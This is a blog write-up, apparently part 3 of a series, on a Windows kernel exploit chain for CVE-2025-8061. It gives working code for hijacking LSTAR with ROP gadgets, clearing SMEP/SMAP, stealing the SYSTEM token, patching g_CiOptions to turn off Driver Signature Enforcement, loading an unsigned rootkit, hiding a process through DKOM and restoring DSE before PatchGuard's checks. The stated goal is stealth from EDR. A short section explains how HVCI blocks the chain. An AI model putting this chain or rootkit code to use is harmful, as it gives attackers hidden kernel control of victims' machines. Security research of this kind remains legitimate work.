bypassing-dse

The complete source code and all supporting components are in the project repository: CVE-2025-8061. This series was inspired by Quarkslab’s article BYOVD to the next level.

In Part 1 we established the vulnerability fundamentals. In Part 2 we evolved the exploit from a fragile PoC into a reliable exploit chain. Part 3 answers the question that naturally follows: what do you actually do with SYSTEM once you have it?

The privilege escalation from Parts 1 and 2 is powerful, but it’s visible. A SYSTEM shell appears in Task Manager. Security tools still see every process we spawn. Endpoint Detection and Response (EDR) solutions can still hook our API calls and flag anomalous behavior.

True persistence and stealth require going deeper. We need to:

Disable Driver Signature Enforcement (DSE) to load unsigned code into the kernel
Deploy a rootkit that hides processes via Direct Kernel Object Manipulation (DKOM)
Restore DSE immediately to evade PatchGuard’s integrity sweeps
Exit cleanly without leaving traces

Overview: The Seven-Stage Attack Chain

The full chain executes in seven distinct stages, each building on the previous:

                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 1: INFORMATION LEAK                                                │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Read LSTAR MSR (0xC0000082) -> Contains KiSystemCall64 address           │
                │  Scan ntoskrnl.exe for the KiSystemCall64 RVA                             │
                │  Subtract known offset -> ntoskrnl.exe base recovered                     │
                │  Result: kASLR defeated                                                   │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 2: SYSCALL HIJACK                                                  │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Scan ntoskrnl.exe for the gadgets RVAs                                   │
                │  Write LSTAR MSR -> Point to "swapgs; iretq" gadget                       │
                │  Build iretq frame on user stack                                          │
                │  Fire syscall -> CPU jumps to our ROP chain instead of KiSystemCall64     │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 3: CR4 REGISTER LEAK                                               │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Usermode: Allocate locked userspace memory for the leaked CR4            │
                │  ROP: mov rax, cr4... -> Write CR4 value into usermode buffer             │
                │  ROP: wrmsr -> Restore LSTAR inside Ring 0 before returning               │
                │  Usermode: Read the CR4 and compute SMEP/SMAP-disabled value              │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 4: TOKEN THEFT                                                     │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  ROP: Disable SMEP/SMAP via CR4 write                                     │
                │  Shellcode: gs:[0x188] -> KTHREAD -> EPROCESS                             │
                │  Walk ActiveProcessLinks until PID == 4 (System)                          │
                │  Copy System token to our EPROCESS -> We are now NT AUTHORITY\SYSTEM      │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 5: DSE BYPASS                                                      │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  NtQuerySystemInformation -> Leak ci.dll kernel base (requires SYSTEM)    │
                │  Scan ci.dll for g_CiOptions RVA via pattern matching                     │
                │  Ring 0 shellcode: Read original value, write 0x0 to disable DSE          │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 6: ROOTKIT DEPLOYMENT                                              │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  CreateService + StartService -> ci.dll skips signature check             │
                │  Rootkit DriverEntry executes -> DKOM unlinks target process              │
                │  Target process vanishes from Task Manager and NtQuerySystemInformation   │
                └───────────────────────────────────────────────────────────────────────────┘
                                                    │
                                                    ▼
                ┌───────────────────────────────────────────────────────────────────────────┐
                │  STAGE 7: CLEANUP                                                         │
                │  ─────────────────────────────────────────────────────────────────────────│
                │  Restore g_CiOptions immediately -> Evade PatchGuard detection            │
                └───────────────────────────────────────────────────────────────────────────┘

Why System Privileges Are Required

Before diving into the DSE bypass mechanics, one architectural detail needs addressing: the rest of the chain can only run with the SYSTEM token, so token theft remains the first step. Why?

The Kernel Module Enumeration Wall

The answer lies in Stage 5. To patch g_CiOptions, we need to know its absolute kernel address. That requires two pieces of information:

The RVA of g_CiOptions within ci.dll, obtained via pattern scanning
The kernel base address of ci.dll, obtained via NtQuerySystemInformation

The first is trivial. We can map ci.dll into usermode memory and scan it just like we did with ntoskrnl.exe. But the second presents a hard barrier.

NtQuerySystemInformation(SystemModuleInformation) returns a list of all loaded kernel modules, including their ImageBase addresses. However, recent Windows builds restrict this: the ImageBase field is only populated for sufficiently privileged callers, meaning a High Integrity (Administrator) or SYSTEM process. Everyone else gets zeroed addresses.

// What a Medium Integrity process sees:
ci.dll ImageBase = 0x0000000000000000  // Useless

// What an Administrator/SYSTEM process sees:
ci.dll ImageBase = 0xFFFFF8051A2B0000  // Real address

If we build shellcode with ciBase = 0x0, the target address degenerates to 0x0 + RVA, for example 0x4A004. Writing to that unmapped low address in Ring 0 triggers an immediate page fault, and the system bluescreens before our rootkit ever loads.

The Modular Shellcode Architecture

Part 2’s shellcode was monolithic: a single BuildShell function that emitted LSTAR restoration, token theft, and system state recovery all in one blob. This worked for privilege escalation, but the full chain requires three distinct Ring 0 payloads:

Token theft: steal SYSTEM token
DSE patch: write 0x0 to g_CiOptions
DSE restore: write original value back to g_CiOptions

Building these as separate monolithic functions would duplicate hundreds of lines of code. The prologue (LSTAR restoration) and epilogue (CR4/SYSRET return sequence) are identical across all three. Only the core payload logic differs.

The Templater

The solution is a templating function that wraps any custom payload with the standard Ring 0 boilerplate. Conceptually, the final generated memory blob looks like this:

+---------------------------------------------+
| Phase 1: Prologue (Restore LSTAR)           |  <- Identical across all payloads
+---------------------------------------------+
| Phase 2: Core Payload                       |  <- Dynamic / Swappable 
+---------------------------------------------+
| Phase 3: Epilogue (Return to User Mode)     |  <- Identical across all payloads
+---------------------------------------------+

SIZE_T BuildRing0Scaffolding(BYTE* FinalPayloadPtr, 
                UINT64 lstar, 
                UINT64 qGadget_swapgs_sysret, 
                UINT64 qGadget_poprcx_ret, 
                UINT64 qGadget_movcr4_rcx_ret,
                UINT64 CR4_original,
                const BYTE* customPayload,
                SIZE_T customSize);

This function constructs a complete Ring 0 shellcode blob in three phases:

Phase 1: LSTAR Restoration

Every shellcode begins by immediately restoring LSTAR to KiSystemCall64. This is critical because the very first instruction after returning from Ring 0 might be a system call (memory allocation, console output, anything). If LSTAR still points to our swapgs ; iretq gadget, that syscall will trigger a crash.

// PROLOGUE: Restore LSTAR
// mov ecx, 0xC0000082
builder.Append("\xb9\x82\x00\x00\xc0", 5);

// mov edx, LSTAR_HIGH
DWORD lstar_hi = (DWORD)(lstar >> 32);
builder.Append("\xba", 1);
builder.Append(&lstar_hi, 4);

// mov eax, LSTAR_LOW
DWORD lstar_lo = (DWORD)(lstar & 0xFFFFFFFF);
builder.Append("\xb8", 1);
builder.Append(&lstar_lo, 4);

// wrmsr
builder.Append("\x0f\x30", 2);
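
The split into lstar_hi and lstar_lo exists because wrmsr takes its 64-bit value as the register pair EDX:EAX, with the MSR index in ECX. The arithmetic can be checked in isolation with a small portable sketch. The names MsrHalves, SplitMsrValue, JoinMsrValue, and CheckRoundTrip are illustrative and do not come from the project:

```cpp
#include <cassert>
#include <cstdint>

// The two 32-bit halves that wrmsr expects in EDX (high) and EAX (low).
struct MsrHalves {
    std::uint32_t high;  // upper 32 bits, destined for EDX
    std::uint32_t low;   // lower 32 bits, destined for EAX
};

// Split a 64-bit MSR value the same way the prologue does.
MsrHalves SplitMsrValue(std::uint64_t value) {
    MsrHalves h;
    h.high = static_cast<std::uint32_t>(value >> 32);
    h.low  = static_cast<std::uint32_t>(value & 0xFFFFFFFFULL);
    return h;
}

// Recombine the halves; this is what the CPU does with EDX:EAX.
std::uint64_t JoinMsrValue(const MsrHalves& h) {
    return (static_cast<std::uint64_t>(h.high) << 32) | h.low;
}

// Sanity check: splitting and rejoining must give back the original value.
void CheckRoundTrip(std::uint64_t value) {
    assert(JoinMsrValue(SplitMsrValue(value)) == value);
}
```

Calling CheckRoundTrip with any kernel-style address (the upper half is typically 0xFFFFF8xx on x64 Windows) confirms that no bits are lost in the split.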

Phase 2: Custom Payload Injection

The middle section simply copies the caller’s payload bytes:

if (customPayload != NULL && customSize > 0) {
    builder.Append(customPayload, customSize);
}

Phase 3: System State Restoration

After the payload executes, we need to:

Re-enable SMEP/SMAP by restoring the original CR4
Transition back to Ring 3 via swapgs ; sysret
Resume execution at the saved userland return address

This is implemented as a ROP chain pushed onto the stack:

// Push chain in reverse order (LIFO)

// swapgs ; sysret ; ret gadget
builder.Append("\x48\xba", 2);
builder.Append(&qGadget_swapgs_sysret, 8); 
builder.Append("\x52", 1);     // push rdx

// Push saved userland RIP (stored in R12 by PrepareStack.asm)
builder.Append("\x41\x54", 2); // push r12

// pop rcx ; ret gadget (loads the saved userland RIP into RCX for sysret)
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_poprcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// mov cr4, rcx ; ret gadget
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_movcr4_rcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// Original CR4 value (with SMEP/SMAP enabled)
builder.Append("\x48\xba", 2); 
builder.Append(&CR4_original, 8); 
builder.Append("\x52", 1);     // push rdx

// pop rcx ; ret gadget (entry point: loads the original CR4 into RCX)
builder.Append("\x48\xba", 2); 
builder.Append(&qGadget_poprcx_ret, 8); 
builder.Append("\x52", 1);     // push rdx

// Restore original RFLAGS into R11 (sysret loads RFLAGS from R11)
builder.Append("\x49\x89\xdb", 3); // mov r11, rbx

// Trigger the ROP chain
builder.Append("\xc3", 1);     // ret
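
The listings in this section call builder.Append(...) and read builder.TotalSize, but the builder's definition is not shown here. A minimal sketch of what such a helper might look like follows, using placeholder bytes rather than real instructions. It is an assumption, not the project's actual class: the capacity parameter and the ComposeBlob function are additions made for illustration, and the original constructor takes only the buffer pointer.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical stand-in for the PayloadBuilder used in the listings above.
class PayloadBuilder {
public:
    std::size_t TotalSize = 0;  // bytes written so far

    PayloadBuilder(std::uint8_t* buffer, std::size_t capacity)
        : buffer_(buffer), capacity_(capacity) {
        assert(buffer != nullptr);
    }

    // Copy `size` raw bytes to the end of the blob.
    // Returns false (and writes nothing) if they would not fit.
    bool Append(const void* data, std::size_t size) {
        if (data == nullptr || size > capacity_ - TotalSize) return false;
        std::memcpy(buffer_ + TotalSize, data, size);
        TotalSize += size;
        return true;
    }

private:
    std::uint8_t* buffer_;
    std::size_t capacity_;
};

// Concatenate prologue | payload | epilogue, mirroring the three-phase layout.
// Returns the total size, or 0 if the output buffer is too small.
std::size_t ComposeBlob(std::uint8_t* out, std::size_t cap,
                        const std::uint8_t* prologue, std::size_t prologueSize,
                        const std::uint8_t* payload, std::size_t payloadSize,
                        const std::uint8_t* epilogue, std::size_t epilogueSize) {
    PayloadBuilder builder(out, cap);
    if (!builder.Append(prologue, prologueSize)) return 0;
    // The payload is optional, matching the NULL / zero-size check in Phase 2.
    if (payload != nullptr && payloadSize > 0 &&
        !builder.Append(payload, payloadSize)) return 0;
    if (!builder.Append(epilogue, epilogueSize)) return 0;
    return builder.TotalSize;
}
```

Tracking a capacity is a deliberate deviation: an append-only builder that cannot overrun its buffer fails loudly at build time instead of silently corrupting adjacent memory.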

Disabling Driver Signature Enforcement

With SYSTEM privileges confirmed, we can proceed to disable DSE. This is the critical gate that prevents unsigned drivers from loading.

What is DSE? Driver Signature Enforcement is Windows’ mechanism for ensuring only Microsoft-signed or cross-signed drivers can execute in Ring 0. When a driver is loaded via NtLoadDriver or the Service Control Manager, the kernel’s Code Integrity module (ci.dll) verifies the driver’s Authenticode signature.

This enforcement is controlled by a global variable: g_CiOptions. This DWORD bitmask determines what level of signature checking is applied. Setting g_CiOptions to 0x0 completely disables signature verification. Any driver can load, signed or not.

Finding g_CiOptions Dynamically

Rather than hardcoding build-specific offsets, we scan ci.dll for the instruction that references g_CiOptions:

DWORD GetCiOptionsRVA() {
    HMODULE hCi = LoadLibraryExA("C:\\Windows\\System32\\ci.dll", 
                                  NULL, DONT_RESOLVE_DLL_REFERENCES);
    
    // Pattern: mov cs:g_CiOptions, ecx / mov r13d, ecx
    // Found in CipInitialize
    const char* pattern = "\x89\x0D\x00\x00\x00\x00\x44\x8B\xE9";
    const char* mask    = "xx????xxx";
    
    DWORD instructionRva = ScanModuleForRVA(hCi, pattern, mask, NULL);
    
    // Extract RIP-relative offset
    UINT8* matchAddress = (UINT8*)hCi + instructionRva;
    INT32 ripOffset = *(INT32*)(matchAddress + 2);
    
    // Calculate: RIP of next instruction + offset = g_CiOptions address
    UINT8* ripNextInstruction = matchAddress + 6;
    UINT8* gCiOptionsLocalAddress = ripNextInstruction + ripOffset;
    
    DWORD dataRva = (DWORD)(gCiOptionsLocalAddress - (UINT8*)hCi);
    
    FreeLibrary(hCi);
    return dataRva;
}

The key insight is that mov cs:g_CiOptions, ecx uses RIP-relative addressing. The instruction encodes a 32-bit signed offset from the end of the instruction to the target variable. We extract this offset, add it to the instruction’s end address, and compute the RVA.
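
The displacement arithmetic is easy to get wrong by a few bytes, so it helps to see it on a synthetic buffer. The sketch below is a portable illustration, not the project's scanner: ResolveRipRelativeTarget is a hypothetical name, and it works on plain offsets into a byte array (which coincide with RVAs when the array is a mapped image). It assumes a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Resolve the target of `mov [rip+disp32], ecx` (opcode bytes 89 0D) located
// at `instructionOffset` inside `image`. Returns the target's offset from the
// start of the image, or -1 if the bytes do not match or the result falls
// outside the image.
std::int64_t ResolveRipRelativeTarget(const std::uint8_t* image,
                                      std::size_t imageSize,
                                      std::size_t instructionOffset) {
    const std::size_t kInstructionLength = 6;  // 2 opcode bytes + 4 displacement bytes
    assert(image != nullptr);
    if (imageSize < kInstructionLength ||
        instructionOffset > imageSize - kInstructionLength) return -1;
    if (image[instructionOffset] != 0x89 ||
        image[instructionOffset + 1] != 0x0D) return -1;

    // Read the signed 32-bit displacement without an unaligned pointer cast.
    std::int32_t displacement = 0;
    std::memcpy(&displacement, image + instructionOffset + 2, sizeof(displacement));

    // RIP-relative means "relative to the address of the NEXT instruction".
    const std::int64_t nextInstruction =
        static_cast<std::int64_t>(instructionOffset + kInstructionLength);
    const std::int64_t target = nextInstruction + displacement;

    if (target < 0 || target >= static_cast<std::int64_t>(imageSize)) return -1;
    return target;
}
```

For an instruction at offset 0x10 with displacement 0xF0, the next instruction starts at 0x16, so the target is 0x16 + 0xF0 = 0x106. A negative displacement works the same way, which is why the value must be read as a signed integer.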

Leaking ci.dll’s Kernel Base

With the RVA in hand, we need the runtime base address. NtQuerySystemInformation provides this:

UINT64 LeakKernelModuleBase(const char* targetModuleName) {
    PNtQuerySystemInformation NtQuerySystemInformation = 
        (PNtQuerySystemInformation)GetProcAddress(
            GetModuleHandleA("ntdll.dll"), 
            "NtQuerySystemInformation"
        );
    
    ULONG returnLength = 0;
    NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &returnLength);
    returnLength += 10 * 1024;  // Buffer for race conditions
    
    PVOID buffer = VirtualAlloc(NULL, returnLength, 
                                MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    
    NtQuerySystemInformation(SystemModuleInformation, buffer, 
                             returnLength, &returnLength);
    
    PRTL_PROCESS_MODULES modules = (PRTL_PROCESS_MODULES)buffer;
    
    for (ULONG i = 0; i < modules->NumberOfModules; i++) {
        char* baseName = (char*)modules->Modules[i].FullPathName + 
                         modules->Modules[i].OffsetToFileName;
        
        if (_stricmp(baseName, targetModuleName) == 0) {
            UINT64 base = (UINT64)modules->Modules[i].ImageBase;
            VirtualFree(buffer, 0, MEM_RELEASE);
            return base;
        }
    }
    
    VirtualFree(buffer, 0, MEM_RELEASE);
    return 0;
}

The function iterates through all loaded kernel modules until it finds ci.dll, then returns its ImageBase. If we’re not running as Administrator/SYSTEM, this returns 0 and the exploit aborts safely.

The DSE Shellcode

The DSE patch payload is simple:

SIZE_T BuildDsePayload(BYTE* buffer, UINT64 targetKernelAddress, 
                       UINT64 userModePtr, DWORD newValue) {
    PayloadBuilder builder(buffer);

    // movabs rax, targetKernelAddress (load g_CiOptions address)
    builder.Append("\x48\xb8", 2);
    builder.Append(&targetKernelAddress, 8);

    // mov ecx, dword ptr [rax] (read current value)
    builder.Append("\x8b\x08", 2);

    // movabs rdx, userModePtr (load backup variable address)
    builder.Append("\x48\xba", 2);
    builder.Append(&userModePtr, 8);

    // mov dword ptr [rdx], ecx (save original for later restore)
    builder.Append("\x89\x0a", 2);

    // mov dword ptr [rax], newValue (write 0x0 to disable DSE)
    builder.Append("\xc7\x00", 2);
    builder.Append(&newValue, 4);

    return builder.TotalSize;
}

The shellcode:

Loads the kernel address of g_CiOptions into RAX
Reads the current value into ECX
Saves it to a usermode variable (for restoration later)
Writes the new value (0x0) to disable enforcement

Note the use of a usermode pointer (&originalDseValue) from Ring 0 shellcode. This works because we’ve disabled SMAP via the CR4 write that happens before our payload executes. The kernel can freely access usermode memory.

Loading the Rootkit

With DSE disabled, the Service Control Manager will accept our unsigned driver:

BOOL LoadKernelDriver(const char* driverPath, const char* serviceName) {
    SC_HANDLE hSCManager = OpenSCManagerA(NULL, NULL, SC_MANAGER_ALL_ACCESS);
    
    SC_HANDLE hService = CreateServiceA(
        hSCManager,
        serviceName,
        serviceName,
        SERVICE_ALL_ACCESS,
        SERVICE_KERNEL_DRIVER,    // Critical: kernel driver type
        SERVICE_DEMAND_START,
        SERVICE_ERROR_NORMAL,
        driverPath,
        NULL, NULL, NULL, NULL, NULL
    );
    
    if (!hService && GetLastError() == ERROR_SERVICE_EXISTS) {
        hService = OpenServiceA(hSCManager, serviceName, SERVICE_ALL_ACCESS);
    }
    
    BOOL success = StartServiceA(hService, 0, NULL);
    
    CloseServiceHandle(hService);
    CloseServiceHandle(hSCManager);
    
    return success;
}

If the DSE bypass succeeded, StartServiceA maps our .sys file into kernel memory and calls DriverEntry. If DSE is still active, we get error 577 (ERROR_INVALID_IMAGE_HASH), which means the signature check failed.

The DKOM Rootkit

Once loaded, the rootkit’s job is simple: make a target process invisible.

How Process Enumeration Works

When tools like Task Manager call NtQuerySystemInformation(SystemProcessInformation), the kernel walks a doubly linked list of processes anchored at PsActiveProcessHead. Every _EPROCESS structure contains a LIST_ENTRY field, ActiveProcessLinks, that chains it to adjacent processes:

    ┌──────────┐     ┌──────────┐     ┌──────────┐
    │ ProcessA │────►│ ProcessB │────►│ ProcessC │
    │          │◄────│ (target) │◄────│          │
    └──────────┘     └──────────┘     └──────────┘
          ▲                                 │
          └─────────────────────────────────┘

If we unlink ProcessB from this list, enumeration skips it entirely. The process continues executing normally, because the scheduler works on threads rather than on this list, but it is invisible to any tool that relies on the process list.

The Unlink Operation

VOID WalkProcList() {
    PEPROCESS CurrentProcess = PsGetCurrentProcess();
    PEPROCESS StartProcess = CurrentProcess;
    const char* TargetProcess = "hello.exe";

    do {
        PUCHAR ProcessName = (PUCHAR)CurrentProcess + IMAGE_FILE_NAME_OFFSET;
        PLIST_ENTRY CurrentListEntry = (PLIST_ENTRY)
            ((PUCHAR)CurrentProcess + ACTIVE_PROCESS_LINKS_OFFSET);

        if (strncmp((const char*)ProcessName, TargetProcess, 15) == 0) {
            PLIST_ENTRY Next = CurrentListEntry->Flink;
            PLIST_ENTRY Prev = CurrentListEntry->Blink;

            // Unlink: A < > B < > C  becomes  A < > C
            Next->Blink = Prev;
            Prev->Flink = Next;

            // Self-pointer fix (critical for stability)
            CurrentListEntry->Flink = CurrentListEntry;
            CurrentListEntry->Blink = CurrentListEntry;

            return;
        }

        CurrentProcess = (PEPROCESS)
            ((PUCHAR)CurrentListEntry->Flink - ACTIVE_PROCESS_LINKS_OFFSET);

    } while (CurrentProcess != StartProcess);
}

The core unlink is just four lines:

Next->Blink = Prev;
Prev->Flink = Next;
CurrentListEntry->Flink = CurrentListEntry;
CurrentListEntry->Blink = CurrentListEntry;

The first two lines bridge the gap: ProcessA now points directly to ProcessC, and vice versa. But the last two lines are equally important.

The Self-Pointer Fix

Without the self-pointer, when the hidden process eventually terminates, the kernel’s cleanup routine tries to unlink it again. It follows the entry’s Flink and Blink pointers, which still point to ProcessA and ProcessC. But those neighbors no longer point back at ProcessB, and by then they may have exited and been freed. The second unlink therefore writes through stale pointers (or trips the kernel’s list-integrity check), and the result is a BSOD.

By pointing the entry to itself, we create a single-element circular list. The cleanup routine sees:

Flink points to self
Blink points to self
Unlinking a self-referential entry is a no-op

The process terminates cleanly, and the system remains stable.
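
The no-op claim can be verified in usermode with an ordinary doubly linked list. The sketch below redeclares a LIST_ENTRY-shaped struct so that it builds anywhere. The helper names mirror the familiar kernel macros but are local re-implementations written for this illustration, and HideEntry and CountEntries are hypothetical names:

```cpp
#include <cassert>

// Same shape as the kernel's LIST_ENTRY, redeclared so the sketch is portable.
struct ListEntry {
    ListEntry* Flink;  // forward link
    ListEntry* Blink;  // backward link
};

void InitializeListHead(ListEntry* head) {
    head->Flink = head;
    head->Blink = head;
}

void InsertTailList(ListEntry* head, ListEntry* entry) {
    ListEntry* last = head->Blink;
    entry->Flink = head;
    entry->Blink = last;
    last->Flink = entry;
    head->Blink = entry;
}

// Plain unlink: rewires the neighbors, leaves the entry's own pointers alone.
void RemoveEntryList(ListEntry* entry) {
    ListEntry* next = entry->Flink;
    ListEntry* prev = entry->Blink;
    prev->Flink = next;
    next->Blink = prev;
}

// Unlink, then point the entry at itself so a later unlink touches nothing else.
void HideEntry(ListEntry* entry) {
    assert(entry != nullptr);
    RemoveEntryList(entry);
    entry->Flink = entry;
    entry->Blink = entry;
}

// Number of entries reachable from the list head (the head itself is not counted).
int CountEntries(const ListEntry* head) {
    int count = 0;
    for (const ListEntry* e = head->Flink; e != head; e = e->Flink) ++count;
    return count;
}
```

After HideEntry on the middle node of a three-entry list, CountEntries drops to two, and a second RemoveEntryList on the hidden node only rewrites the node's own pointers. A self-referential entry also satisfies the consistency condition that checked list removal looks for (Flink->Blink and Blink->Flink both pointing back at the entry).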

Racing PatchGuard

There’s a critical timing element to this entire chain: PatchGuard.

PatchGuard (officially “Kernel Patch Protection”) is a Windows security feature that periodically validates the integrity of critical kernel structures. It checks:

Kernel code sections (ntoskrnl.exe, etc.)
System service dispatch tables (SSDT)
Global Descriptor Table (GDT)
Interrupt Descriptor Table (IDT)
Critical global variables… including g_CiOptions

If PatchGuard detects that g_CiOptions has been modified, it triggers bugcheck 0x109 (CRITICAL_STRUCTURE_CORRUPTION). Game over.

The Window

PatchGuard doesn’t run continuously. It executes at pseudo-random intervals, typically every 5-15 minutes. This gives us a window of opportunity:

Patch g_CiOptions to 0x0
Load the unsigned driver
Restore g_CiOptions to its original value before PatchGuard’s next sweep

If we complete all three steps before PatchGuard runs, it never sees the modification. The value matches the expected hash, and no alarm is raised.

Implementation

The chain explicitly restores DSE immediately after driver load:

// Patch DSE
WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
PrepareStack(Payload_DsePatch, ...);
// g_CiOptions is now 0x0

// Load driver while DSE is disabled
LoadKernelDriver("C:\\rootkit.sys", "Rootkit");

// Restore DSE immediately
WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
PrepareStack(Payload_DseRestore, ...);
// g_CiOptions restored to original value

The entire DSE-disabled window lasts only milliseconds. Unless PatchGuard’s integrity check happens to fire inside that window, the modification is never observed.

Putting It All Together

The complete execution flow in fulldsechain.cpp:

int main() {
    // 1. Open vulnerable driver
    HANDLE hDev = OpenDriver();
    
    // 2. Dynamic scanning: find all gadgets and KiSystemCall64 RVA
    HMODULE hNtoskrnl = LoadLibraryExA("ntoskrnl.exe", ...);
    DWORD KISYSTEMCALL64_OFFSET = ScanModuleForRVA(hNtoskrnl, kiPattern, ...);
    DWORD GADGET_SWAPGS_IRETQ   = ScanModuleForRVA(hNtoskrnl, ...);
    // ... scan all required gadgets ...
    
    // 3. Defeat kASLR
    UINT64 lstar = ReadMSR(hDev, MSR_LSTAR);
    UINT64 kernelBase = lstar - KISYSTEMCALL64_OFFSET;
    
    // 4. CR4 leak phase
    void* LeakBuffer = VirtualAlloc(NULL, 0x200, ...);
    VirtualLock(LeakBuffer, 0x200);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStackCr4(...);  // Leaks CR4, restores LSTAR inside Ring 0
    UINT64 CR4_original = *(UINT64*)((UINT8*)LeakBuffer + 0x18);
    UINT64 CR4_smep_smap_off = CR4_original & ~0x300000ULL;
    
    // 5. Token theft phase
    SIZE_T shellSize = BuildRing0Scaffolding(Payload_PrivEsc, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_PrivEsc, ...);
    // Verify: we should now be SYSTEM
    
    // 6. DSE bypass phase
    DWORD ciOptionsRVA = GetCiOptionsRVA();
    UINT64 ciKernelBase = LeakKernelModuleBase("ci.dll");
    UINT64 targetKernelAddress = ciKernelBase + ciOptionsRVA;
    
    BuildRing0Scaffolding(Payload_DsePatch, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_DsePatch, ...);
    // g_CiOptions is now 0x0
    
    // 7. Load rootkit
    LoadKernelDriver("C:\\rootkit.sys", "Rootkit");
    // Target process is now hidden
    
    // 8. Restore DSE
    BuildRing0Scaffolding(Payload_DseRestore, ...);
    WriteMSR(hDev, MSR_LSTAR, qGadget_swapgs_iretq);
    PrepareStack(Payload_DseRestore, ...);
    // g_CiOptions restored, PatchGuard won't notice
    
    // 9. Cleanup
    VirtualFree(Payload_DsePatch, 0, MEM_RELEASE);
    VirtualFree(Payload_DseRestore, 0, MEM_RELEASE);
    VirtualFree(Payload_PrivEsc, 0, MEM_RELEASE);
    CloseHandle(hDev);
    
    return 0;
}

The chain fires three Ring 0 payloads in sequence. Each one overwrites LSTAR, builds a custom stack frame, triggers a syscall that jumps to our ROP chain, executes payload code, restores system state, and returns to usermode. The vulnerable driver is used purely as a primitive provider, and the real exploitation happens in our carefully constructed shellcode.

Why This Fails on HVCI Systems

Everything documented in this series (the LSTAR hijack, CR4 manipulation, and g_CiOptions patching) works only when Hypervisor-Enforced Code Integrity (HVCI) is disabled.

On HVCI-enabled systems, the hypervisor intercepts sensitive operations before the kernel sees them:

CR4 Write Interception

The VMCS (Virtual Machine Control Structure) configures a CR4 write mask. Any attempt to clear the SMEP or SMAP bits triggers a VM exit:

Guest attempts: mov cr4, rcx (with bit 20 cleared)
Hypervisor: Validates against CR4 mask
Result: CRITICAL_STRUCTURE_CORRUPTION

Our entire ROP chain relies on disabling SMEP. Without that, the first ret to usermode shellcode faults immediately.
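
The bit positions involved are fixed by the architecture: SMEP is CR4 bit 20 and SMAP is CR4 bit 21, which is where the 0x300000 mask in the main listing comes from. A small sketch of that arithmetic follows. The constant and function names are illustrative, and the sample CR4 value used in the note below is made up for the example:

```cpp
#include <cassert>
#include <cstdint>

constexpr std::uint64_t kCr4Smep = 1ULL << 20;  // Supervisor Mode Execution Prevention
constexpr std::uint64_t kCr4Smap = 1ULL << 21;  // Supervisor Mode Access Prevention

// The combined mask equals the literal used when computing CR4_smep_smap_off.
static_assert((kCr4Smep | kCr4Smap) == 0x300000ULL, "SMEP|SMAP mask mismatch");

// Value a guest would try to write to turn both protections off.
constexpr std::uint64_t ClearSmepSmap(std::uint64_t cr4) {
    return cr4 & ~(kCr4Smep | kCr4Smap);
}

constexpr bool SmepEnabled(std::uint64_t cr4) { return (cr4 & kCr4Smep) != 0; }
constexpr bool SmapEnabled(std::uint64_t cr4) { return (cr4 & kCr4Smap) != 0; }

// True if the write would change either protected bit, which is the kind of
// change a hypervisor-owned CR4 mask is meant to catch.
constexpr bool TouchesProtectedBits(std::uint64_t oldCr4, std::uint64_t newCr4) {
    return ((oldCr4 ^ newCr4) & (kCr4Smep | kCr4Smap)) != 0;
}
```

With an illustrative CR4 of 0x350EF8, ClearSmepSmap yields 0x050EF8, and TouchesProtectedBits reports true for that transition. All other bits are left untouched, which is why the chain can later restore the original value verbatim.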

KDP-Protected Variables

Kernel Data Protection uses Second Level Address Translation (SLAT) to mark sensitive variables as read-only at the hardware level:

Ring 0 write to g_CiOptions
    ▼
EPT entry: Read-only
    ▼
#EPT_VIOLATION
    ▼
Hypervisor bugchecks the system

The hypervisor doesn’t care that we’re running in Ring 0. It sits below the kernel and enforces policies the kernel can’t override.

The bottom line: HVCI/VBS is the actual security boundary. Everything we’ve built works against systems where it’s disabled, which, unfortunately, still includes many enterprise and consumer machines. But on a properly configured Windows 11 system with Memory Integrity enabled, this entire chain is dead on arrival.

Conclusion

We started this series with a simple question: what can you do with an MSR read/write primitive?

The answer, as it turns out, is everything.

Part 1 established the fundamentals: kASLR bypass via LSTAR, SMEP/SMAP defeat via CR4 manipulation, and Ring 0 shellcode execution via syscall hijacking.
Part 2 made it portable: dynamic gadget scanning, runtime CR4 leaking, and build-aware _EPROCESS traversal.
Part 3 made it dangerous: modular shellcode architecture, DSE bypass via g_CiOptions patching, unsigned driver loading, and DKOM-based process hiding.

The complete chain transforms a single vulnerable driver into a full kernel implant: privilege escalation, signature bypass, and stealth all in one automated executable.

But there is a glaring flaw in our current methodology: noise.

While blinding Driver Signature Enforcement (DSE) allows us to load unsigned code, using standard Windows APIs like NtLoadDriver or the Service Control Manager leaves a massive forensic footprint. The load is recorded in the event log, a registry key is created for the service, and the driver is linked into PsLoadedModuleList for any competent EDR to find instantly.

To achieve true stealth, we have to stop playing by the operating system’s rules.

